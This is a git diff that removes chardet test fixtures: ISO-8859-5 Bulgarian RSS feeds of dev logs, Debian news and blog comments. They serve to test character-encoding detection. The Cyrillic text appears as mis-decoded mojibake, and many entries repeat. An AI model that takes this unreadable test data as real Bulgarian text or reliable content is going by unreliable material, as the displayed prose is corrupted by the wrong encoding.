    -מ׳ךאב״ן אה״ ױ ךװױג׀ג באן ׂ״ן װ״׳׀ ׀ מ׳ךא ״בג׀
    -(kaladan/spud/webcrusader)]]>
    -devzilla (dev.log) -supudo -2005-06-05T01:06:10+02:00 -
    - -*bpm 5 (medusa 0.6.7 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6954 -*bpm 5 (medusa 0.6.7 : commons cretives)
    -²בױ״, ג ״׀ בג׀ג״ן ׂ *bpm ״ ״ב׀ װ׀ ן א׀׳אבגא׀״ װ ן ג ׂ׀א״׀ג״גױ ׀ creative commons, ױ׀ ״טױ ׀ Lucash.
    -
    -+ ב״בגױ׀ ׳׀ ״זױ׳״א׀ױ ׀ בךװךאײ׀״ױג װ CC ״ ׳׀גׂאױ ״זױ׳ (kaladan/spud);
    -
    -+ אױ״ ׂ editorial-a בׂךא׳׀״ ב ״זױ׳״א׀ױג ׀ בךװךאײ׀״ױ (kaladan/spud);
    -
    -+ ׂ editorial-׀ ײױ װ׀ בױ ׀׳ׂ׀ג ׂב״ח״ בג׀ג״״, ׀״ב׀״ ג ױװ״ ׀ׂגא (kaladan/spud)
    -
    -+ בך׳װ׀װױ׀ ױ בג׀ג״בג״׀ ׳׀ ״זױ׳״גױ ׀ בג׀ג״״גױ (kaladan/spud )| http://bpm.cult.bg/services/licenses/
    -
    -+ א״ ׂ״׳׀ױ ׂ shuriken, ךאׂ״ן ױא׀ ױ ױא׀ךג ב logs (ivgin//spud)
    -
    -+ ׁאן ׀ ׀׳ׂ׀״גױ ב״״ ׀ ױא׀׀ ׂ printscreen ױ אױױ ג 3, 6, 9 ״ 12, בךגׂױג ׀ 9, 18 ״ 36. (ivgin/spud)]]>
    -*bpm 5 (medusa 0.6.7 : commons cretives)
    -²בױ״, ג ״׀ בג׀ג״ן ׂ *bpm ״ ״ב׀ װ׀ ן א׀׳אבגא׀״ װ ן ג ׂ׀א״׀ג״גױ ׀ creative commons, ױ׀ ״טױ ׀ Lucash.
    -
    -+ ב״בגױ׀ ׳׀ ״זױ׳״א׀ױ ׀ בךװךאײ׀״ױג װ CC ״ ׳׀גׂאױ ״זױ׳ (kaladan/spud);
    -
    -+ אױ״ ׂ editorial-a בׂךא׳׀״ ב ״זױ׳״א׀ױג ׀ בךװךאײ׀״ױ (kaladan/spud);
    -
    -+ ׂ editorial-׀ ײױ װ׀ בױ ׀׳ׂ׀ג ׂב״ח״ בג׀ג״״, ׀״ב׀״ ג ױװ״ ׀ׂגא (kaladan/spud)
    -
    -+ בך׳װ׀װױ׀ ױ בג׀ג״בג״׀ ׳׀ ״זױ׳״גױ ׀ בג׀ג״״גױ (kaladan/spud )| http://bpm.cult.bg/services/licenses/
    -
    -+ א״ ׂ״׳׀ױ ׂ shuriken, ךאׂ״ן ױא׀ ױ ױא׀ךג ב logs (ivgin//spud)
    -
    -+ ׁאן ׀ ׀׳ׂ׀״גױ ב״״ ׀ ױא׀׀ ׂ printscreen ױ אױױ ג 3, 6, 9 ״ 12, בךגׂױג ׀ 9, 18 ״ 36. (ivgin/spud)]]>
    -devzilla (dev.log) -Kaladan -2005-05-21T17:05:01+02:00 -
    - -*bpm 5 (medusa 0.6.6 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6952 -*bpm 5 (medusa 0.6.6 : reuse me!)
    -
    -+ ט׀ׁךג ׀ userlist-׀ ױ ׀גד׀״׳״א׀ באן װ״׳׀׀ ׀ medusa (ivgin/kaladan/webcrusader).
    -
    -+ ָ׀ׁךג ׳׀ גאױׁ״גױ״גױ יױ ׁךװױ אױױ בךי.
    -
    ----
    -דגאױ יױ בך׳װ׀װױ װׂ״׃׀גױ ׳׀ ״זױ׳״א׀ױ ׀ בג׀ג״״גױ ׂ ױ׳״׀ װ CC.]]>
    -*bpm 5 (medusa 0.6.6 : reuse me!)
    -
    -+ ט׀ׁךג ׀ userlist-׀ ױ ׀גד׀״׳״א׀ באן װ״׳׀׀ ׀ medusa (ivgin/kaladan/webcrusader).
    -
    -+ ָ׀ׁךג ׳׀ גאױׁ״גױ״גױ יױ ׁךװױ אױױ בךי.
    -
    ----
    -דגאױ יױ בך׳װ׀װױ װׂ״׃׀גױ ׳׀ ״זױ׳״א׀ױ ׀ בג׀ג״״גױ ׂ ױ׳״׀ װ CC.]]>
    -devzilla (dev.log) -Kaladan -2005-05-20T18:05:56+02:00 -
    - -*bpm 5 (medusa 0.6.5 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6742 -*bpm 5 (medusa 0.6.5 : reblog!)
    -
    -+ ׀גד׀״׳״א׀׀* ױ /logs (kaladan);
    -
    ----
    -* װׁ׀ׂױ״ ב׀ mo: dreamlog, speechless, ׀גד׀״׳״א׀״ ב׀ ׀װאױב״גױ ׀ wondering, zazie, אױ׀ו׀ג״ ב׀ Bitstream bl0g
    -light, skylark, soulseller.]]>
    -*bpm 5 (medusa 0.6.5 : reblog!)
    -
    -+ ׀גד׀״׳״א׀׀* ױ /logs (kaladan);
    -
    ----
    -* װׁ׀ׂױ״ ב׀ mo: dreamlog, speechless, ׀גד׀״׳״א׀״ ב׀ ׀װאױב״גױ ׀ wondering, zazie, אױ׀ו׀ג״ ב׀ Bitstream bl0g
    -light, skylark, soulseller.]]>
    -devzilla (dev.log) -Kaladan -2005-04-02T21:04:10+02:00 -
    - -ױ, וא׀, ן ׂ״, ױ... -http://bpm.cult.bg/medusa/logs/?id=&pid=6650 -אבגג״״ ׀ *printscreen. אחױגױגױ דךגׂ׀ױג, ׀ ױ דײ ״ help-׀. ׁ׀׃װ׀אן אױװׂ׀א״גױ.]]> -אבגג״״ ׀ *printscreen. אחױגױגױ דךגׂ׀ױג, ׀ ױ דײ ״ help-׀. ׁ׀׃װ׀אן אױװׂ׀א״גױ.]]> -devzilla (dev.log) -atomant -2005-03-16T21:03:58+02:00 - - -*bpm 5 (medusa 0.6.4 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6559 -*bpm 5 (medusa 0.6.4 : ױװױן ׂױחױאג׀!)
    -
    -+ װׁ׀ׂןױג ׀ ׂ״ גאױׁ״גױ״ א׀ׁג״ ׁױ׳ אׁױ״, ג ״ אױװ״ ב״ א׀ׁגױטױ, ׳׀ ה״׀ ׁךׂ׀טױ ן׀ׂ׀ ׃אױט׀ (kaladan/spud);
    -
    -+ printscreen א׀ׁג״ גׂ, atom יױ ױױ ׁ׃א״ײׂ׀ױג ד (kaladan/spud);
    -
    -+ א׀ׂױ׀ ױ ׀׀ א׀ׂ״ב׀ ׃אױט׀ ׀ ״װױב׀;
    -
    -+ אױ׀ו׀ג״ ב׀ ׂב״ח״ בג׀א״ ׃ׂױ (ג 2003-ג׀ ׃װ״׀ - בךיױבגׂדׂ׀ו׀ ב״ ״ ׁןו׀ ׀ׁךב׀״ ב 85 ױ׃׀ׁ׀ג׀ ב׀)]]>
    -*bpm 5 (medusa 0.6.4 : ױװױן ׂױחױאג׀!)
    -
    -+ װׁ׀ׂןױג ׀ ׂ״ גאױׁ״גױ״ א׀ׁג״ ׁױ׳ אׁױ״, ג ״ אױװ״ ב״ א׀ׁגױטױ, ׳׀ ה״׀ ׁךׂ׀טױ ן׀ׂ׀ ׃אױט׀ (kaladan/spud);
    -
    -+ printscreen א׀ׁג״ גׂ, atom יױ ױױ ׁ׃א״ײׂ׀ױג ד (kaladan/spud);
    -
    -+ א׀ׂױ׀ ױ ׀׀ א׀ׂ״ב׀ ׃אױט׀ ׀ ״װױב׀;
    -
    -+ אױ׀ו׀ג״ ב׀ ׂב״ח״ בג׀א״ ׃ׂױ (ג 2003-ג׀ ׃װ״׀ - בךיױבגׂדׂ׀ו׀ ב״ ״ ׁןו׀ ׀ׁךב׀״ ב 85 ױ׃׀ׁ׀ג׀ ב׀)]]>
    -devzilla (dev.log) -Kaladan -2005-02-27T17:02:28+02:00 -
    - -¿אױװבג״ אױג ח״בגׂ׀ױ ׀ ׁך׃ׂױ.... -http://bpm.cult.bg/medusa/logs/?id=&pid=6497 - -
    -+ ׀או״ׂךג ׀ װד״גױ ׂ ezine א׀ׁג״ ״ ׂױחױ ײױ װ׀ ׀ױא״ט ג׀ אדב׀ג״גױ ג גױׁ בג׀ג״״ (spud)
    -+ װׁ׀ׂױ״ ב׀ ״ׂױ ך ״װױב׀ ׀ ezine ׀ ׳׀׃aׂ״גױ בגא׀״ז״ ׀ װד״גױ, ׀ ״ג ״בׂ׀ו׀ ג׀״ׂ׀ (spud)]]>
    - -
    -+ ׀או״ׂךג ׀ װד״גױ ׂ ezine א׀ׁג״ ״ ׂױחױ ײױ װ׀ ׀ױא״ט ג׀ אדב׀ג״גױ ג גױׁ בג׀ג״״ (spud)
    -+ װׁ׀ׂױ״ ב׀ ״ׂױ ך ״װױב׀ ׀ ezine ׀ ׳׀׃aׂ״גױ בגא׀״ז״ ׀ װד״גױ, ׀ ״ג ״בׂ׀ו׀ ג׀״ׂ׀ (spud)]]>
    -devzilla (dev.log) -Lucash -2005-02-16T21:02:45+02:00 -
    - -991 ד״׀״ בױיױ״ן בי״. -±׀׃װ׀אן ׂ״. -http://bpm.cult.bg/medusa/logs/?id=&pid=6239 -991 ד״׀״ בױיױ״ן בי״.
    -±׀׃װ׀אן ׂ״.]]>
    -991 ד״׀״ בױיױ״ן בי״.
    -±׀׃װ׀אן ׂ״.]]>
    -devzilla (dev.log) -ivgin -2005-01-11T09:01:14+02:00 -
    - -א׀׀ג״ -²ױחױ ב״׃דא ׂב״ח״ בגױא׀׳ׁא׀״, חױ... -http://bpm.cult.bg/medusa/logs/?id=&pid=5995 -א׀׀ג״
    -²ױחױ ב״׃דא ׂב״ח״ בגױא׀׳ׁא׀״, חױ ׁןוױ א׀׀ג״. ·׀׃דׁױ״ ב׀ װבג׀ ״׳ׁא׀ײױ״ן, ׂ בׂ״גױ ב׀גׂױ. ¸׀ױ ׁױ ך ג ׀ח׀ג ׀ בױגױׂא״ (א׀ן ׀ ׀ׂ׃דבג), ױג ׳׀ח׀ׂ׀, חױ יױג״גױ ױ ב׀ גׂ׀ ה׀ג׀״.]]>
    -א׀׀ג״
    -²ױחױ ב״׃דא ׂב״ח״ בגױא׀׳ׁא׀״, חױ ׁןוױ א׀׀ג״. ·׀׃דׁױ״ ב׀ װבג׀ ״׳ׁא׀ײױ״ן, ׂ בׂ״גױ ב׀גׂױ. ¸׀ױ ׁױ ך ג ׀ח׀ג ׀ בױגױׂא״ (א׀ן ׀ ׀ׂ׃דבג), ױג ׳׀ח׀ׂ׀, חױ יױג״גױ ױ ב׀ גׂ׀ ה׀ג׀״.]]>
    -devzilla (dev.log) -Kaladan -2004-12-03T19:12:22+02:00 -
    -
    diff --git a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.medusa.4.xml b/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.medusa.4.xml deleted file mode 100644 index e700f45..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.medusa.4.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - -cybertech corp. (tech.log) -http://bpm.cult.bg/medusa/logs/?id=4 -<b>¸׀ בׂױג״׀ ׂ גדױ׀!</b><br /> -¿אױוװךג ג homo sapiens ך robo sapiens ױ גאדװױ ״ ׁ׀ׂױ. ½ױ׀ ד ׃ױ :) ¿בױװ״גױ ׂבג״ ג בׂױג׀ ׀ ׂ״ב״גױ גױו׃״״. ¼׀״ גױױה״, ׃ױ״ ױא׀״, ׀ח״ׂױ, ׁ״מגא״, ׂ״ׁא׀גא״ בךב בךחױׂ׀ ׁ׀גױא״ן - גױ׳״ ״ יױ ׃ װאד׃״ ״׳ױ׀װ״ ג ׁךװױיױג - גד ״ בױ׃׀ ׀ ׂ״ זױ׀.<br /> -<br /> -<b>÷׀ װ׀ דׁ״דׂ׀ גד?</b><br /> -1. ְױ׃״בגא״א׀ט בױ ׂ userlist-׀ ׀ ב׀ג׀;<br /> -2. ²בױ״ אױ׃״בגא״א׀ גאױׁ״גױ ײױ װ׀ דׁ״דׂ׀ ׂךׂ ׂב״ח ׁ׃ׂױ בׂױ ׂ Devzilla ״ Bazaar.<br /> -<br /> -<b>¿א׀ׂ״׀ ׳׀ דׁ״״ׂ׀ױ?</b><br /> -1. ½״׀ׂ״ ״ׂױ ך א׃א׀הב בךװךאײ׀״ױ! ֵ, גׂ׀ ׁױטױ ׳׀ װאד׃ ׃, ״ גד ױ א״ײ״.<br /> -2. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן, ״ג א׀׳ט״אןׂ׀ג א׀׀ג׀ ׀ ׃׀ - ״ ױ ׁ״ח׀ וא״׳ג׀ױ בא-ׁ׀א;<br /> -3. ¿דׁ״דׂ׀גױ ױװ״בגׂױ ״׳ׁא׀ײױ״ן ׂ jpg, png ״ gif הא׀ג. BMP ״ TIF ב׀ גג׀ ױא״׃װ״ ׳׀ web;<br /> -4. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן -׃ױ״ ג 10K. ±׃ׂױגױ ״ ׁױ׳ גׂ׀ ב׀ ׃א״;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Quantum Trickery: Testing Einstein's Strangest... -http://bpm.cult.bg/medusa/logs/?id=&pid=7622 -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -ױ, ױ ײ׀ו װ׀ בױ ׂך׳װךאײ׀, בא״ :)]]>
    -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -ױ, ױ ײ׀ו װ׀ בױ ׂך׳װךאײ׀, בא״ :)]]>
    -cybertech corp. (tech.log) -mims -2005-12-30T00:12:25+02:00 -
    - -ן ׳׀ױ ״ ׀ ׀׃׀׳״... -http://bpm.cult.bg/medusa/logs/?id=&pid=7619 - -ױ דבןו װ׀ ׀ױאן בׂױבגױ ׀ג׀׃ ב ׀ אךח״.]]> - -ױ דבןו װ׀ ׀ױאן בׂױבגױ ׀ג׀׃ ב ׀ אךח״.]]> -cybertech corp. (tech.log) -supudo -2005-12-25T14:12:24+02:00 - - -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀: -One Laptop Per... -http://bpm.cult.bg/medusa/logs/?id=&pid=7556 -
    -
    -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀:
    -One Laptop Per Child
    -
    -°ױא״׀ב׀ הװ׀ז״ן יױ ״ג׀ װ׀ ב״׃דא״ ׀ 150 ״״׀ װױז׀ ׀ג״ ׀ זױ׀ $100. °אױ װ׀ ׂ״װ״.]]>
    -
    -
    -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀:
    -One Laptop Per Child
    -
    -°ױא״׀ב׀ הװ׀ז״ן יױ ״ג׀ װ׀ ב״׃דא״ ׀ 150 ״״׀ װױז׀ ׀ג״ ׀ זױ׀ $100. °אױ װ׀ ׂ״װ״.]]>
    -cybertech corp. (tech.log) -ivgin -2005-11-17T12:11:33+02:00 -
    - -Looks like the revolution with... -http://bpm.cult.bg/medusa/logs/?id=&pid=7553 - - - - - -*bpm. ezine -http://bpm.cult.bg/ezine/ -*bpm . ezine -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -±׀׀װ׀ג׀ ׳׀ ´ײ׀ ״ ְד׳ -http://bpm.cult.bg/ezine/cinema/?id=712 - - -*bpm . ezine / cinema -Lucash - - - -÷ױװ׀ ו״ׂדװב״ -http://bpm.cult.bg/ezine/etc/?id=711 - - -*bpm . ezine / etc -Zimed - - - -·װא׀ׂױ גׂ, ״״ ךװױ ׁױטױ, גךאב״ו גױ! -http://bpm.cult.bg/ezine/etc/?id=710 - - - - - - -Debian ±ך׃׀א״ן: ½ׂ״״ -http://debian.gabrovo.com -½ׂ״״ ׳׀ Deian ׀ ׁך׃׀אב״ -bg -Copyright 2001, Nikolay Hristov - - -10 years Debian GNU/Linux (16 august 2003) -http://debian.gabrovo.com/show.php?id=67&tablica=news&sub=ֲױ׀ - - - -Guide to Debian/GNU Linux Desktop Survival -http://debian.gabrovo.com/show.php?id=66&tablica=news&sub=ֲױ׀ - - - -ֹױ זױױױ ״ Debian? -http://debian.gabrovo.com/show.php?id=65&tablica=news&sub=ֲױ׀ - - - -Debian Book ׳׀ ׁך׃׀א״ (ב ״׳ׂױבג ׳׀ךבױ״ױ) -http://debian.gabrovo.com/show.php?id=64&tablica=news&sub=ֲױ׀ - - - -²׀׳ײבג ׳׀ אױ׃״בגא׀ז״ן ״ װׁ׀ׂןױ ׀ ׂ״״/בג׀ג״״ -http://debian.gabrovo.com/show.php?id=61&tablica=news&sub=ֲױ׀ - - - -debian-bg mailing list ׳׀ גאױׁ״גױ״גױ ׀ Debian ׂ ±ך׃׀א״ן -http://debian.gabrovo.com/show.php?id=60&tablica=news&sub=ֲױ׀ - - - -÷״א״״׳״א׀ױ ׀ Debian 3.0 woody -http://debian.gabrovo.com/show.php?id=59&tablica=news&sub=ֲױ׀ - - - -¼׀ HOWTO-ג׀ גב ״בג׀״א׀ױ ׀ א׀׳״ח״ ׀ױג״ -http://debian.gabrovo.com/show.php?id=58&tablica=news&sub=ֲױ׀ - - - -Security Updates - in.uucpd, ethereal -http://debian.gabrovo.com/show.php?id=57&tablica=news&sub=ֲױ׀ - - - -Security Updates - ב ׃ן ׳׀ךבױ״ױ -http://debian.gabrovo.com/show.php?id=56&tablica=news&sub=ֲױ׀ - - - - diff --git a/chardet/tests/iso-8859-5-bulgarian/debian.gabrovo.com.xml b/chardet/tests/iso-8859-5-bulgarian/debian.gabrovo.com.xml deleted file mode 100644 index 737c99a..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/debian.gabrovo.com.xml +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - -Debian ±ך׃׀א״ן: ½ׂ״״ -http://debian.gabrovo.com -½ׂ״״ ׳׀ Deian ׀ ׁך׃׀אב״ -bg -Copyright 2001, Nikolay Hristov - - -÷׀ װ׀ ׳׀װ׀ׂ׀ױ ׂךאב״ (howto ג Eric Raymond) -http://debian.gabrovo.com/show.php?id=9&tablica=articles&sub=ֲױ׀ - - - -¿װׁאןׂ׀ױ ׀ ב״׃דאבגג׀ ׀ Debian ׳׀ unstable/testing -http://debian.gabrovo.com/show.php?id=8&tablica=articles&sub=ֲױ׀ - - - -Mplayer ׳׀ Debian - ךװױ ״ ׀? -http://debian.gabrovo.com/show.php?id=6&tablica=articles&sub=ֲױ׀ - - - -÷׀ װ׀ ׀א׀ׂ״ debian ׀ױג ג unstable ׳׀ potato? -http://debian.gabrovo.com/show.php?id=5&tablica=articles&sub=ֲױ׀ - - - - diff --git a/chardet/tests/iso-8859-5-bulgarian/doncho.net.comments.xml b/chardet/tests/iso-8859-5-bulgarian/doncho.net.comments.xml deleted file mode 100644 index 96c5930..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/doncho.net.comments.xml +++ /dev/null @@ -1,62 +0,0 @@ - - - - - - blog.doncho.net Comments - http://blog.doncho.net - ÷ךבחױג׀ ײ״ׂג - Wed, 04 Jan 2006 16:15:10 +0000 - http://wordpress.org/?v=1.5.2 - - - Comment on ´׀ דבג״א׀ױ ״״ װ׀ ױ דבג״א׀ױ? by: ²׀װ - http://blog.doncho.net/?p=396#comment-10614 - Wed, 04 Jan 2006 16:03:21 +0000 - http://blog.doncho.net/?p=396#comment-10614 - "You get what you pay for" :-) ½ױ ׂ״׀׃״ ׀א״גױ ב׀ ׀-ׂ׀ײ״ןג א״גױא״. ½ חׂױ גאןׁׂ׀ װ׀ ״׳אׁׂ׀ ׂב״ח״ ז״״. -´ׁאױ װט״ ׁא׀ג ׂ ´׀״ן. - “You get what you pay for” :-) ½ױ ׂ״׀׃״ ׀א״גױ ב׀ ׀-ׂ׀ײ״ןג א״גױא״. ½ חׂױ גאןׁׂ׀ װ׀ ״׳אׁׂ׀ ׂב״ח״ ז״״.
    -´ׁאױ װט״ ׁא׀ג ׂ ´׀״ן.

    -]]>
    -
    - - Comment on Secure Image: א׀ןג ׀ ױג׀א״ן ב׀? by: Velizar - http://blog.doncho.net/?p=347#comment-10602 - Mon, 02 Jan 2006 06:51:23 +0000 - http://blog.doncho.net/?p=347#comment-10602 - ·׀ח״ גטױ״ױ ׀ SecurityImage Code, ױװ״ ׂךאב - ׳׀ ׀ׂ ג״ ױ hidden ׀א׀ױגךא׀ -"securityhash"? ´ ג בוׂ׀י׀ גׂ׀ ױ MD5 וױט׀ ׀ secirity code, ג גאןׁׂ׀ װ׀ בױ ׂךׂױװױ ״ באױװ גׂ׀, ױג ױ ׂךׂױ מ׳ױא׀ ׃ בא׀ׂןׂ׀ט װ׀״ ױ ׂןאג... ½ ׳׀י גאןׁׂ׀ װ׀ ׃ ׀׳ׂ׀ט ׀ ב׀ג׀?? ¿ א״ז״ ױ ױ ״ -װׁאױ ג׳״ ׀א׀ױגךא װ׀ ׃ "װךאײ״ט" בא״ג ׂ בױב״ןג׀, ג.ױ. ׂױבג גׂ׀ hidden ױ ״בן, חױ ױ -װׁאױ װ׀ ׳ׂ׀ט $_SERVER['securityhash'] = ... ֱ׀ ״װױן װױ, ױ ׃ א״ױ׀ ׀ג א״ג״׀, ײױ ״ װ׀ ױ בך ׃ א׀׳ׁא׀ א׀ׂ״:) -ֱ׀גךג ױ ׃ג״, ׳װא׀ׂױ״ן! ¸ א׀׳ׁ״א׀ בױ ַױבג״ג׀ ׂ׀ ׃װ״׀! -ֳבױו! - ·׀ח״ גטױ״ױ ׀ SecurityImage Code, ױװ״ ׂךאב - ׳׀ ׀ׂ ג״ ױ hidden ׀א׀ױגךא׀
    -“securityhash”? ´ ג בוׂ׀י׀ גׂ׀ ױ MD5 וױט׀ ׀ secirity code, ג גאןׁׂ׀ װ׀ בױ ׂךׂױװױ ״ באױװ גׂ׀, ױג ױ ׂךׂױ מ׳ױא׀ ׃ בא׀ׂןׂ׀ט װ׀״ ױ ׂןאג… ½ ׳׀י גאןׁׂ׀ װ׀ ׃ ׀׳ׂ׀ט ׀ ב׀ג׀?? ¿ א״ז״ ױ ױ ״ -װׁאױ ג׳״ ׀א׀ױגךא װ׀ ׃ “װךאײ״ט” בא״ג ׂ בױב״ןג׀, ג.ױ. ׂױבג גׂ׀ hidden ױ ״בן, חױ ױ -װׁאױ װ׀ ׳ׂ׀ט $_SERVER[’securityhash’] = … ֱ׀ ״װױן װױ, ױ ׃ א״ױ׀ ׀ג א״ג״׀, ײױ ״ װ׀ ױ בך ׃ א׀׳ׁא׀ א׀ׂ״:)
    -ֱ׀גךג ױ ׃ג״, ׳װא׀ׂױ״ן! ¸ א׀׳ׁ״א׀ בױ ַױבג״ג׀ ׂ׀ ׃װ״׀!
    -ֳבױו!

    -]]>
    -
    - - Comment on ¼ײױטױ by: donangel - http://blog.doncho.net/?p=390#comment-10528 - Sat, 17 Dec 2005 11:05:30 +0000 - http://blog.doncho.net/?p=390#comment-10528 - °״״ גאׂױ ׃... ״ ׂבן׀ׂ״... - °״״ גאׂױ ׃… ״ ׂבן׀ׂ״…

    -]]>
    -
    - - Comment on ¼ײױטױ by: ³ױא׃״ ³ױׂ - http://blog.doncho.net/?p=390#comment-10527 - Sat, 17 Dec 2005 09:46:50 +0000 - http://blog.doncho.net/?p=390#comment-10527 - ֶ״ג׀ג: ".. אױ׳״װױגךג ״ װאד׃״ן ״ג״חױב״ ׁד ײױו׀ װ׀ ב״ ׂ׳ןג ״א״׳״ׂ״גױ ׃ך׳ׂױ ׂ ׂ״ ָװ״ ״״ ֵמװ׀.." -÷׀ג ׃ױװ׀ ״ ג״ ב״ ׳׀ בךװ. °׳ ׀ ׁןו ׀ ןבגג ׀ אױ׳״װױג׀ ׁ״ו ג״ בךװא׀ ׳׀װ״׀ :) - ֶ״ג׀ג: “.. אױ׳״װױגךג ״ װאד׃״ן ״ג״חױב״ ׁד ײױו׀ װ׀ ב״ ׂ׳ןג ״א״׳״ׂ״גױ ׃ך׳ׂױ ׂ ׂ״ ָװ״ ״״ ֵמװ׀..”
    -÷׀ג ׃ױװ׀ ״ ג״ ב״ ׳׀ בךװ. °׳ ׀ ׁןו ׀ ןבגג ׀ אױ׳״װױג׀ ׁ״ו ג״ בךװא׀ ׳׀װ״׀ :)

    -]]>
    -
    - - Comment on ÷ד \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-bulgarian/ecloga.cult.bg.xml b/chardet/tests/iso-8859-5-bulgarian/ecloga.cult.bg.xml deleted file mode 100644 index 580b6ef..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/ecloga.cult.bg.xml +++ /dev/null @@ -1,89 +0,0 @@ -<?xml version="1.0" encoding="iso-8859-5"?> -<!-- -Source: http://ecloga.cult.bg/log/wp-rss.php -Expect: ISO-8859-5 ---> -<!-- generator="wordpress/1.0.1" --> -<rss version="0.92"> - <channel> - <title>ec-log - http://ecloga.cult.bg/log/index.php - ecloga log - Wed, 04 Jan 2006 16:20:37 GMT - http://backend.userland.com/rss092 - ecloga@mail.bg - ecloga@mail.bg - bg - - - ·׀ׂ - ֱי״ אױ״בןו װבױ׃׀ט׀ג׀ ״בגא״ן ׀ גׂ׀ ױבגױזױ ״ אױט״ו, חױ ׂױחױ ן׀ דײװ׀ ג ױ׃ ׂ ג׳״ ד ׂ״װ. ֲׂ׀ ױ ׳׀ח׀ׂ׀, חױ ׂױחױ ן׀ װ׀ ״׀ ׁ׃, יױ ׃ ״׀, יױ בױ אױ״, ״בן חױ ױ ױ װׁא׀ ״װױן װ׀ אװךײ׀ׂ׀, װ׀ ב״ ׂװן װױׂ״ ׂ דׁ״ח אבגא׀בגׂ, ױ ױ גׂ׀ ״חױ. ²בױ יױ ׁ״בן ׀ךׂ ׂ״װ יױ א״װׁ״ױ בךװךאײ׀״ױג, ״׀ ן״ ״װױ״ ״ גױךאׂ׀ ״בן װ׀ ׃״ ׂױװאן. ÷ג ״ב׀ װ׀ ׂ׀אבגׂ׀, ױ׀ ב״ ׃ױװ׀ גױױׂ״׳״ן. - http://ecloga.cult.bg/log/index.php?p=251 - - - ²׀אױב ״׳ןג - ¸ ג׀׀, אױחױ-בגאױ, ׀ׂ״ו ױװ״ א״ןגױ ״ ג זךה׀ ד ׀ב װ׀ ״ױ ׁ״א׀ ״ װ׀ ב״, ׳׀ װ׀ ײױ בדגא״ג׀ װ׀ בױ בגׂ׀א״ ׂ ױג ׀ ׀ׂג׃׀א׀ג׀. ֵׂ׀׀וױ ױװ״ א״״חױ ׀ׂגׁדב ׀ ±״ױג ״ ׀װב״ ױװב׀״ (װׂ׀ ח׀ב׀ בך) בױ ױבוױ ך ²׀א׀. °׳ בױ ׳׀ׁ׀ׂןׂ׀ו ב ױ100, א״׀׳ׂ׀וױ ׳׀ אױײׂ״ ״הא׀בגאדגדא״ ״ ב׀וױ. ָױבג ח׀ב׀ -ךב, ׁןוױ ׀ ׂ׀אױב׀ג׀ ׀ׂג׃׀א׀ ״ ח׀׀וױ ״ױ״׀. ֵ׀׀וױ טױׁױ ׂ ÷׀״׀ג׀, ׁױ׳ ״ױ״׀, ג ״׳חױ׳׀ א״ ױ׃ׂ בך״ױ״, ״ וד׀וױ װ׀ ״׳װ״אׂ׀ױ ׃ן׀ג׀ ׂ׀. ¿ ךגן ׀ ׃״׀ג׀, ׂ׀ג׀ גאןׁׂ׀טױ װ׀ בױ ׀״א׀ ׀װד, ג׀ ׁױטױ, ׀ װ׀ױחױ ״ ״׀טױ װׂױ, ׀׳ א׀ׂ״ אױװײ״ו, חױ אב׀ג׀ ׃א׀װ״׀ בױ ׀״א׀ ׀ןׂ ג ךגן ג גאך׃׀וױ, װׁאױ חױ ״׀ אױא׀ב חדבגׂ ׳׀ א״ױג׀ז״ן, ג׀ דבןוױ װ׀ בױ ׂךאױ ׀ ״׳וװ ײױ״ױ װאד׃ ךג, ׳׀ א׀׳ׁא׀׳״ױ. -²ױחױאג׀, ױבגױבגׂױ, אױ״׀ ׂ ״ױױ ״ ױ ׁױ׳ב״בױ״ באׂױ, ״ױ ׁ״ח׀ױ װ׀ בא״, גאןׁׂ׀ װ׀ ױ ׳׀ׁ׀ׂ. ¿אױװ״ גׂ׀ דבןו װ׀ בױ ׂ״װן ב ¼״ט ״ °ג״ (װ׀ בך ׳׀״ א׀ׂ״), ײ׀ חױ יןו׀ װ׀ וװןג ׀ ן׀ׂ״ ׁד׃׀׀. -ֱךׁג׀ג׀ ן אב׀וױ װ א׀״ן בױװׁױװ, ׂבךיבג ׀׳ ב״ ױ׃׀ו 7:30 ״ ן׀טױ ׀ח״. ¾בג׀׀׀ג׀ ח׀בג ג װױן ׃ אױ׀א׀וױ ׂ ½אג (׃ ׃ג״ ׳׀ׂױװױ״ױ, ױׂג״ ״ ב א״ןג׀ ׃ױװ׀), ״װ״גױ ״ ז׀ז׀ג׀ ׁןו׀ ׀ ׃ א״״ח״ זױ״ ״ ׃א׀׀ײ, טױׁױג ״ ׁױטױ ׂװ״בג, ׀ ױװ ׂאױױ דב׀ו׀ ״ ה. ½׀ׁמװ׀ׂ׀וױ ױײױװױׂ״ױג ׀ ׃׀אדב״גױ, ׀ װגא׀ ״ א׀׳ןב״ ׀ׂ אױװבג׀ׂןׂ׀ג וױא״װ״גױ, ׃ׂא״וױ ״ ׳׀ ׀׀װ״ב״ג, גׂ׀ ׁןו׀ װבג׀ א״ױ״ׂ״ גױ״ ׂ בא׀ׂױ״ױ ב י״גױ ״ באׂױ ׳׀ ֱ¸² ״ ׀״ג׀״׳׀. ¿בױ בױ א׀׳וװ״וױ ״׳ אב׀ג׀ װ װגא׀ ״ בױ א״ׁא׀וױ װ׀ ״ױ ױװ-װׂױ ״ װ׀ בױ ׀ב״. ½׀ א׀׳ׂ״װױןׂ׀ױ ״װ״גױ ״ב׀ו׀ 